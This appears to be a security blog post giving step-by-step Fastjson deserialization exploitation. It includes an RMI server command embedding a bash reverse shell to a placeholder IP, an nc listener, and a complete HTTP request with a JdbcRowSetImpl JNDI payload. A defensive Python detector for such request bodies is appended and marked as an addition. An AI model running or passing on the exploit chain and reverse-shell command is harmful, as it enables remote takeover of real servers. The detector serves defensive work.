
Fastjson vulnerability exploitation techniques

2022-06-24 16:08:00 Bypass

Every time I see JSON data in a request, I inevitably think of Fastjson and the vulnerabilities in multiple versions of it.

This post shares a few tips on how to automate detection and simplify the attack steps, so that vulnerability discovery becomes more capable and more efficient.


01、 Automated vulnerability detection

This relies on a passive Fastjson scanning plug-in for Burp Suite. The plug-in tests the requests passing through Burp Suite that carry JSON data.

GitHub project address:

https://github.com/pmiaowu/BurpFastJsonScan

02、 Simplify attack steps

Here we can use a JNDI service exploitation tool to simplify the steps of Fastjson vulnerability detection and to assist with exploitation and penetration testing.

GitHub project address:

https://github.com/wyzxxz/jndi_tool

Fastjson exploit:

(1) Start the RMI service

java -cp jndi_tool.jar jndi.EvilRMIServer 1099 8888 "bash -i >&/dev/tcp/xxxx.xxx.xxx.xxx/12345 0>&1"

(2) Set up the listener on the server

nc -lvvp 12345

(3) Construct the request and send the payload

POST /login HTTP/1.1
Host: xxx.xxx.xxx.xxx
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Content-Type: application/json;charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
Content-Length: 111

{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://xxx.xxx.xxx.xxx:1099/Object","autoCommit":true}

(4) The target system receives the POST request and the reverse shell connects back successfully.
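
A defender-side counterpart to the request in step (3), added here as an example and not part of the original post: it parses a JSON request body and reports any `@type` member or JNDI-style URL value, at any nesting depth. The function names, the scheme list and the benign sample body are assumptions made for illustration.

```python
import json

# URL schemes a JNDI lookup can resolve; client-supplied JSON rarely needs them.
# (Assumed list for this example; extend it to match your environment.)
JNDI_SCHEMES = ("rmi://", "ldap://", "ldaps://", "iiop://", "dns://")


def _walk(node, path="$"):
    """Yield (path, key, value) for every member of every nested JSON object."""
    if isinstance(node, tuple):  # JSON object, kept as (key, value) pairs
        for key, value in node:
            yield path, key, value
            yield from _walk(value, f"{path}.{key}")
    elif isinstance(node, list):  # JSON array
        for i, item in enumerate(node):
            yield from _walk(item, f"{path}[{i}]")


def inspect_body(body):
    """Return a list of findings for one JSON request body (str or bytes)."""
    try:
        # Parsing (instead of substring matching) decodes escaped key names,
        # and object_pairs_hook=tuple keeps every member, repeated keys included.
        doc = json.loads(body, object_pairs_hook=tuple)
    except (ValueError, RecursionError):
        return ["unparseable-json"]
    findings = []
    for path, key, value in _walk(doc):
        if key == "@type":
            findings.append(f"{path}: @type={value!r}")
        if isinstance(value, str) and value.strip().lower().startswith(JNDI_SCHEMES):
            findings.append(f"{path}.{key}: JNDI-style URL")
    return findings


if __name__ == "__main__":
    samples = [
        # Body from step (3) of the post, host placeholder unchanged.
        '{"@type":"com.sun.rowset.JdbcRowSetImpl",'
        '"dataSourceName":"rmi://xxx.xxx.xxx.xxx:1099/Object","autoCommit":true}',
        # Constructed benign login body for comparison.
        '{"username":"alice","password":"example"}',
    ]
    for body in samples:
        print(inspect_body(body) or "clean")
```

The same check can sit in a reverse proxy hook or run over captured request bodies; a non-empty result on an endpoint that never expects typed JSON is worth an alert.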

Copyright notice
This article was created by [Bypass]. Please include the original link when reposting. Thank you.
https://yzsam.com/2022/175/202206241545216953.html